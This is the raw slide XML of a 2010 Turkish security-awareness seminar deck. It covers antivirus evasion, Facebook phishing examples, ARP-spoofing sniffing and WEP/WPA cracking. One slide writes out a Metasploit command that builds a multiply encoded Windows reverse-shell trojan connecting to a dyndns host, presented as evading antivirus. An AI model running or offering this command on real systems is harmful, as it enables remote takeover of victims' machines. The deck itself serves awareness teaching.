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4" r:id="rId4"/>
    <p:sldId id="265" r:id="rId5"/>
    <p:sldId id="266" r:id="rId6"/>
    <p:sldId id="271" r:id="rId7"/>
    <p:sldId id="267" r:id="rId8"/>
    <p:sldId id="268" r:id="rId9"/>
    <p:sldId id="272" r:id="rId10"/>
    <p:sldId id="273" r:id="rId11"/>
    <p:sldId id="274" r:id="rId12"/>
    <p:sldId id="269" r:id="rId13"/>
    <p:sldId id="270" r:id="rId14"/>
    <p:sldId id="258" r:id="rId15"/>
    <p:sldId id="257" r:id="rId16"/>
    <p:sldId id="279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custDataLst>
    <p:tags r:id="rId2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89100" autoAdjust="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849E-D4AC-46B6-BD67-EE9FFEB8FCAC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BD19-76D3-4AF1-A911-75FC2974D3E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BD19-76D3-4AF1-A911-75FC2974D3E6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02.11.2010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ozanuca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file-scan/report.html?id=9b524a487ed70317000c787d9354d02f404cfa80712c6bd1733bc4d97d3cdad1-128854425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hturkiye.com/index.php/2010/06/07/wireless-pentest-wpa-crack/wireless-pentest-wpa-crack.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cehturkiye.com/wireless-hacking/wep-cracking.html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852512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Bilişim Güvenliği Semineri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546872"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Ozan UÇAR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Bilgi Güvenliği Araştırmacısı</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>mail@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ozanucar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="tr-TR" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>C|EHTURKİYE.COM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>@2010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Saldırı Denemeleri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71454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Antivirüsler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>imzatabanlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t> çalışır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Gelişmiş </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>antivirüsler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t> test yaparak içeriği analiz edebilir veya sezgisel olarak yazılımın hareketlerini algılayabilir</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Örnek</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfpayload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windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LHOST=ozan.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dyndns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.org LPORT=443 R | ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shikata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -c 10 | ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -e x86/call4_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -c 10 | ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>countdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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Saldırı Denemeleri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97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Tarama sonuçları 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900" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="tr-TR" sz="900" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="tr-TR" sz="900" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="tr-TR" sz="900" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="tr-TR" sz="900" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="900" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="900" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>virustotal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="900" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>.com/file-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="900" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="900" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="900" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>report</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="900" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>.html?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="900" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="900" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=9b524a487ed70317000c787d9354d02f404cfa80712c6bd1733bc4d97d3cdad1-1288544256</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="9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endParaRPr lang="tr-TR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="3 Resim" descr="bypassantivir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215" y="2348880"/>
            <a:ext cx="726215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Mühendislik Saldırıları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Facebook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 smtClean="0"/>
              <a:t>, Banka Hesapları Avlama Teknikleri</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Aldatma sanatı</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Gerçek dünyadan örnekler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Saldırı Denemeleri 3</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="5 Resim" descr="facebookfakepan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02529"/>
            <a:ext cx="6048672" cy="2322815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="4 Resim" descr="facebookfakelo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952" y="2996952"/>
            <a:ext cx="4861048" cy="2227981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="3 İçerik Yer Tutucusu" descr="facebookfakemesaj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628800"/>
            <a:ext cx="4944165" cy="14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sniffingar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48880"/>
            <a:ext cx="6878010" cy="397248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İnternet Trafiği Nasıl Dinleniyor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Aktif </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Sniffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>;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7" name="36 Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="259881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Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="364502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Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="4437112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Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="54452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Köşeleri Yuvarlanmış Dikdörtgen Belirtme Çizgisi"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5652120" y="5373216"/>
            <a:ext cx="1728192" cy="792088"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -128131"/>
              <a:gd name="adj2" fmla="val -29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1.1.1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> ip adresi benim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>mac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> adresim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> 00-0c-29-6d-d1-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>ef</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="42 Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3491880" y="386104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3779912" y="36450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Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3923928" y="36450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45 Resim" descr="sniffingarp2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect l="55361" b="75332"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4610966" y="2361580"/>
            <a:ext cx="3019278" cy="1008112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="46 Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="2564904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Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="3573016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Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1610147" y="4456162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415 0.00093 L 0.04063 0.02222 L 0.25764 0.02315 L 0.25851 0.15347 L 0.25955 0.175 L 0.41216 0.18287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023 L 0.06736 -0.00185 L 0.06649 -0.09746 L 0.13316 -0.10301 L 0.17153 -0.12084 L 0.2599 -0.11968 L 0.26163 0.03912 L 0.27153 0.03148 L 0.41649 0.03588 " pathEditMode="relative" ptsTypes="AAAAAAAAA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671 L 0.1342 -0.00439 L 0.13507 -0.08449 L 0.39843 -0.07893 " pathEditMode="relative" ptsTypes="AAAA">
                                      <p:cBhvr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-0.0044 L 0.24704 -0.0044 L 0.24843 -0.19699 " pathEditMode="relative" ptsTypes="AAA">
                                      <p:cBhvr>
                                        <p:cTn id="2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L -0.06667 0.00949 L -0.07813 0.08449 L -0.21615 0.0842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9 -0.10926 L -0.08472 -0.11111 L -0.10417 -0.10185 L -0.11944 -0.09444 L -0.19028 -0.09074 L -0.19583 0.00556 L -0.25694 0.00556 " pathEditMode="relative" ptsTypes="AAAAAA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16 -0.11297 L -0.2125 -0.11482 L -0.21389 -0.13334 L -0.25833 -0.13889 " pathEditMode="relative" ptsTypes="AAA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25 L 0.03959 0.02107 L 0.09271 0.0294 L 0.25105 0.03634 L 0.24948 0.41597 L 0.02049 0.41667 L 0.24549 0.4132 L 0.25035 0.19097 L 0.40295 0.2 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="6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0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0417 L 0.0533 0.00556 L 0.05122 -0.09167 L 0.11267 -0.09167 L 0.14809 -0.11805 L 0.24705 -0.11805 L 0.24705 0.2625 L 0.21372 0.2625 L 0.19705 0.25972 L 0.14184 0.25833 L 0.1033 0.25833 L 0.05434 0.25417 L 0.00156 0.27176 L 0.24913 0.25972 L 0.25243 0.0419 L 0.41163 0.04746 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAAAAAAAAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="6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25 L 0.11771 -0.00463 L 0.12188 -0.07547 L 0.2323 -0.08658 L 0.23438 0.12592 L 0.22605 0.13564 L 0.1125 0.13842 L 0.05105 0.13981 L 0.02292 0.14814 L 0.00625 0.15092 L 0.23785 0.13425 L 0.24115 -0.08681 L 0.39532 -0.08565 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAAAAAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="6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İnternet Trafiği Nasıl Dinleniyor </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="7 Resim" descr="pasif-sniff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6792273" cy="370574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Pasif </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Sniffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>;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5" name="4 Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="270892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547664" y="3861048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691680" y="4869160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3851920" y="4221088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3923928" y="4221088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3995936" y="4221088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L 0.04497 0.00117 L 0.05 0.02663 L 0.10243 0.02779 L 0.25573 0.02779 L 0.25747 0.19121 L 0.4066 0.19121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592 -0.00116 L 0.0599 -0.11667 L 0.12083 -0.12338 L 0.15417 -0.14329 L 0.25156 -0.14329 L 0.25 0.03102 L 0.2599 0.01435 L 0.3125 0.02106 L 0.35573 0.02106 L 0.37083 0.02453 L 0.3875 0.02662 L 0.39583 0.03449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301 L 0.18802 0.00301 L 0.19375 -0.10255 L 0.23715 -0.10486 L 0.24288 -0.12593 L 0.26962 -0.12824 L 0.30712 -0.12824 L 0.33872 -0.12824 L 0.36719 -0.12593 L 0.38125 -0.13588 " pathEditMode="relative" rAng="0" ptsTypes="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0092 0.00672 L 0.01007 0.07547 L 0.05416 0.08102 L 0.0625 0.08565 L 0.06666 0.1044 L 0.06597 0.17338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4.07407E-6 L 0.00851 0.00648 L 0.00937 0.07291 L 0.05104 0.07847 L 0.05885 0.08287 L 0.06302 0.10115 L 0.06215 0.14861 L 0.06719 0.16967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4.07407E-6 L 0.00625 0.00671 L 0.00712 0.07546 L 0.03837 0.08101 L 0.04427 0.08564 L 0.0474 0.10439 L 0.04601 0.14953 L 0.04097 0.16851 " pathEditMode="relative" rAng="0" ptsTypes="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İnternet Trafiği Nasıl Dinleniyor </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="5 İçerik Yer Tutucusu" descr="xplic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000240"/>
            <a:ext cx="8143932" cy="38021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Kablosuz Ağ Saldırıları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Kablosuz ağlar nasıl çalışır</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Güvenlik Seçenekleri</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Saldırı Yöntemleri</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>WEP, WPA anahtarlarının güvenliği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Kablosuz Ağ Saldırıları</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="3 İçerik Yer Tutucusu" descr="wireless-gir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864" y="2207604"/>
            <a:ext cx="8229600" cy="39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WEP/WPA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Crack</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="5 İçerik Yer Tutucusu" descr="aircrackfinalpasswordcra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5832648" cy="2438676"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="6 Resim" descr="wephac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060848"/>
            <a:ext cx="4781655" cy="3575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323528" y="561304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5"/>
              </a:rPr>
              <a:t>http://cehturkiye.com//wireless-hacking/wep-cracking.html</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>cehturkiye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
